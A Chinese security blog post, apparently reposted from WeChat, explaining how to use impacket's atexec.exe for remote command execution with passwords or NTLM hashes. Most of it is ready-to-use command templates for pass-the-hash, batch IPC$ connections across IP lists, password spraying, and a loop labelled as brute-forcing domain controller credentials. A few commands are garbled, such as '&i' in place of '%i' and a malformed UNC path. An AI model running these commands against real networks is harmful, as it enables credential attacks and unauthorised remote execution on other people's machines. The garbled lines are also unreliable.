点击上方蓝字关注我们
使用atexec传递密码或hash
https://github.com/maaaaz/impacket-examples-windows
注意事项
atexec最好需要指定administrator用户
atexec首次执行需要执行两次
如下图所示:
第一次以普通管理员用户执行命令,失败。
第二次以administrator执行命令,成功建立连接,但是命令执行失败。
再次以administrator执行命令,成功,有回显。
单个传递密码
域环境下
atexec.exe <domain>/<username>:<password>@<ip> "<command>"
本地环境下
atexec.exe ./<username>:<password>@<ip> "<command>"
单个传递hash(ntlmhash)
域环境下
atexec.exe -hashes :<hash> <domain>/<username>@<ip> "<command>"
本地环境下
atexec.exe -hashes :<hash> ./<username>@<ip> "<command>"
批量传递密码
注意事项
如果写成批处理,那么%i
需要变成%%i
(ips.txt)需要使用小括号包裹
DOS命令
dos命令除了变量以外不区分大小写,包括执行参数也不区分大小写。
批量尝试连接ipc$,连接成功后可以使用net use
查看。
for /f %i in (<ips.txt>) do net use \%iipc$ "<password>" /user:<username>
明文密码批量执行命令
FOR /F %i in (<ips.txt>) do atexec.exe ./<username>:<passwd>@%i "<command>"
hash批量执行命令
FOR /F %i in (<ips.txt>) do atexec.exe -hashes :<hash> ./<username>@%i "<command>"
爆破域控密码
指定密码或者hash去爆破指定机器
# 指定密码集
FOR /F %i in (<passswds.txt>) do atexec.exe ./<username>:&i@<ip> "<command>"
# 指定hash集
FOR /F %i in (<hashs.txt>) do atexec.exe -hashes :%i ./<username>@<ip> "<command>"
Eightbit 致力于寻找一群热爱技术、热爱分享的大佬师傅们,组建一个简单的圈子。简单到在这个的圈子里大家没有任何利益,没有任何冲突,大家只有一个简单的夙愿,就是在一起交流交流技术,交流交流想法,一起开心的吹吹水就好。我们交流的内容主要在网络安全方向,包括但不限于web安全、内网渗透、免杀、逆向分析、二进制分析、移动逆向分析、安全竞赛等。不论你是大佬、还是一个憧憬进入网络安全圈子的新秀,大家在技术面前都是平等的,我们都可以一切交流学习。有想法的师傅们可以加入我们的交流群一起交流哦~
原文始发于微信公众号(Eightbit):使用atexec 进行喷洒攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论